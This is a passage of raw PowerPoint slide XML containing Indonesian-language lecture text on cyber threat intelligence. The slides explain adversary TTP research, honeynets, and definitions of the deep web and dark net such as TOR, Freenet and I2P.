              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</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188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342399005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Deep and Dark Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berusaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TTP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akademis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform firewall dan antimalware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TTP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>indikatornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi-organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> honeynet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Deep web dan dark web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Deep web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> World Wide Web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diindeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>registrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengindeksan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencarian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditautkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DNS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikodekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> deep web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Dark Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> The Onion Router (TOR), Freenet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> I2P, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganonimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
